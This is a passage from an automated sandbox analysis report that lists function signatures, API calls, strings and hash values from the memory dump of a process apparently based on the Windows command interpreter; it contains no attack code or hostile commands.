                                      • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                      • Instruction Fuzzy Hash: C0A17FAB90968385E660AB11A45027DF7A0FF45F98FC89138DA5D47794EF3CE442DB20
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                      • String ID: NTDLL.DLL$NtQueryInformationProcess
                                      • API String ID: 1580871199-2613899276
                                      • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                      • Instruction ID: 755817d8110116f08696ab2d24cd81590d939f796dc2df318c8c47438126ff5f
                                      • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                      • Instruction Fuzzy Hash: 3C5162B6A18B8386EB509B15A8042B9B7A4FB88F88F896135DA5D47B94DF3CD441C710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                      • String ID: con
                                      • API String ID: 689241570-4257191772
                                      • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                      • Instruction ID: 9c8dcfecd28d6c0326ef28215ad4318520c299bf06dc7bf01f3a795db6a3665b
                                      • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                      • Instruction Fuzzy Hash: AD41C47BA0864686E610AF11D444379FAE1F789FA9F988734DA2D473D0CF3DD8498750
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                      • String ID: PE
                                      • API String ID: 2941894976-4258593460
                                      • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                      • Instruction ID: d2d6c0fa4bd03f395b5ac6abf3d740e63f8a5ae9ad7c3c4c3f717cc803ab0d41
                                      • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                      • Instruction Fuzzy Hash: 3E4187AB61868387E650AB11E814279F7B0FB89F94F895130DE6D43B95DF3CD445CB10
                                      APIs
                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF755CC849D,?,?,?,00007FF755CCF0C7), ref: 00007FF755CB0045
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF755CCF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CB0071
                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB0092
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF755CB00A7
                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB0148
                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF755CB0181
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                      • String ID:
                                      • API String ID: 734197835-0
                                      • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                      • Instruction ID: ebb9bbabd97acd5f6dfe653cd31bf7a1aa051f8c9b53f2035ee0cc5a5e26201a
                                      • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                      • Instruction Fuzzy Hash: 40618FBBA0869386E764AB11A804379FAA1FB45F6CFC88135D94E52794DF3CA845C720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Enum$Openwcsrchr
                                      • String ID: %s=%s$.$\Shell\Open\Command
                                      • API String ID: 3402383852-1459555574
                                      • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                      • Instruction ID: ea3943154b1f4061677e91a45b9d681a8c1871d91234b66dd6c3d4c912772969
                                      • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                      • Instruction Fuzzy Hash: 74A1B4ABA0868382EE10AB55D0502B9E2A0FF85F98FC85535DA5E4B7C5DF7CF941C320
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$wcscmp
                                      • String ID: %s
                                      • API String ID: 243296809-3043279178
                                      • Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                      • Instruction ID: 0d093746e14a501871b5a1a3b64ad7042bc1de33aa71188688b6f12e9c87786d
                                      • Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                      • Instruction Fuzzy Hash: 08A192AB70968786EB62EB21D8403F9A3A0FB48B5CFD84135CE4D47695DF3CEA448310
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$EnvironmentVariable
                                      • String ID: DIRCMD
                                      • API String ID: 1405722092-1465291664
                                      • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                      • Instruction ID: 8e756c3ae51bd03c351cfd60d39a837d687a4c9f1904d7840ce064ef7d84968a
                                      • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                      • Instruction Fuzzy Hash: EE8160B7A04BC289EB20DF60E8802ED77A5FB44B48F944139DB8D57B58DF38D5458710
                                      APIs
                                        • Part of subcall function 00007FF755CACD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                        • Part of subcall function 00007FF755CACD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      • wcschr.MSVCRT(?,?,?,00007FF755CA99DD), ref: 00007FF755CA9A39
                                        • Part of subcall function 00007FF755CADF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF755CACEAA), ref: 00007FF755CADFB8
                                        • Part of subcall function 00007FF755CADF60: RtlFreeHeap.NTDLL ref: 00007FF755CADFCC
                                        • Part of subcall function 00007FF755CADF60: _setjmp.MSVCRT ref: 00007FF755CAE03E
                                      • wcschr.MSVCRT(?,?,?,00007FF755CA99DD), ref: 00007FF755CA9AF0
                                      • wcschr.MSVCRT(?,?,?,00007FF755CA99DD), ref: 00007FF755CA9B0F
                                        • Part of subcall function 00007FF755CA96E8: memset.MSVCRT ref: 00007FF755CA97B2
                                        • Part of subcall function 00007FF755CA96E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CA9880
                                      • _wcsupr.MSVCRT ref: 00007FF755CBB844
                                      • wcscmp.MSVCRT ref: 00007FF755CBB86D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                      • String ID: FOR$ IF
                                      • API String ID: 3663254013-2924197646
                                      • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                      • Instruction ID: e1cee137eed4047d90fbb1acd914be3481e3e3adb89e0333467bd2b6e8c93142
                                      • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                      • Instruction Fuzzy Hash: 1351C3AAF0964382FE55BB15D41117DAAA1AF84FACFCC8635D91E4B7D5DE3CE8018320
                                      APIs
                                      • iswdigit.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF0D6
                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF1BA
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF1E7
                                      • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF1FF
                                      • iswdigit.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF2BB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswdigit$iswspacewcschr
                                      • String ID: )$=,;
                                      • API String ID: 1959970872-2167043656
                                      • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                      • Instruction ID: f3e009d78811d903e3f6911efb4efcff5cad7c53c18243614c22dca2f3d14744
                                      • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                      • Instruction Fuzzy Hash: EC419EEFE0825785FBA4AB15E554379FAA0AF50F59FCC5835CA8D421A0DF3CA4818B20
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                      • String ID: %04X-%04X$:
                                      • API String ID: 930873262-1938371929
                                      • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                      • Instruction ID: 8823e4d852b7f9c629d29d546a1c7fd6e4550f40bd673be64cd8a9642139b146
                                      • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                      • Instruction Fuzzy Hash: C44192BBA08A8382EB60AB50E4502BAE7A0FB84F5CFC85135D95D436C5DF7CD545C720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                      • API String ID: 3249344982-2616576482
                                      • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                      • Instruction ID: 8ca40c52e5d191975eaa800fa16968c0116b32e12cfb034c79e7224a5e994b5d
                                      • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                      • Instruction Fuzzy Hash: 46417FB7A18B8286E7109F12A84476AFBA4FB89FD8F884234DA4D57794CF3CD455CB10
                                      APIs
                                      • iswdigit.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6A73
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6A91
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6AB0
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6AE3
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6B01
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$iswdigit
                                      • String ID: +-~!$<>+-*/%()|^&=,
                                      • API String ID: 2770779731-632268628
                                      • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                      • Instruction ID: 22bcf26c5ea5e2eb50abee0d847a8cca5cd59b831de802f88fd03dda360e83e1
                                      • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                      • Instruction Fuzzy Hash: F8315DA7609A9785EB50AF01E450278B7F0FB89F99BD98135DA8E43354EF7CE844D320
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                      • String ID:
                                      • API String ID: 3192234081-0
                                      • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                      • Instruction ID: 032da6cf92a24cccae1d06e76e2a790838cdd8c219abf91f7356d4712ae2910c
                                      • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                      • Instruction Fuzzy Hash: C531B17A6086838BE750BF21E40527DFB91FB89F98F889634DE5A47791CE3CD4018B10
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB1673
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB168D
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB1757
                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB176E
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB1788
                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB179C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Alloc$Size
                                      • String ID:
                                      • API String ID: 3586862581-0
                                      • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                      • Instruction ID: 9ec7009563c03dcca7ed8337ac911dc9e0d57b060b29ad4e3f1dea1665a70f92
                                      • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                      • Instruction Fuzzy Hash: BD9159BBA09A4381EB51AB15E450379B6A0FB45FA8FDD8135CA5D477A0DF7CE881C320
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                      • String ID:
                                      • API String ID: 1313749407-0
                                      • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                      • Instruction ID: 7ea52fa7f0625041a85fb23977ccf0d6cdf5a4c55a4f785003d734fcab4753dd
                                      • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                      • Instruction Fuzzy Hash: B251B5ABA0868382EA50BB119818179E695BF45FACFCC5234DD1E677D1EF3CE840C660
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
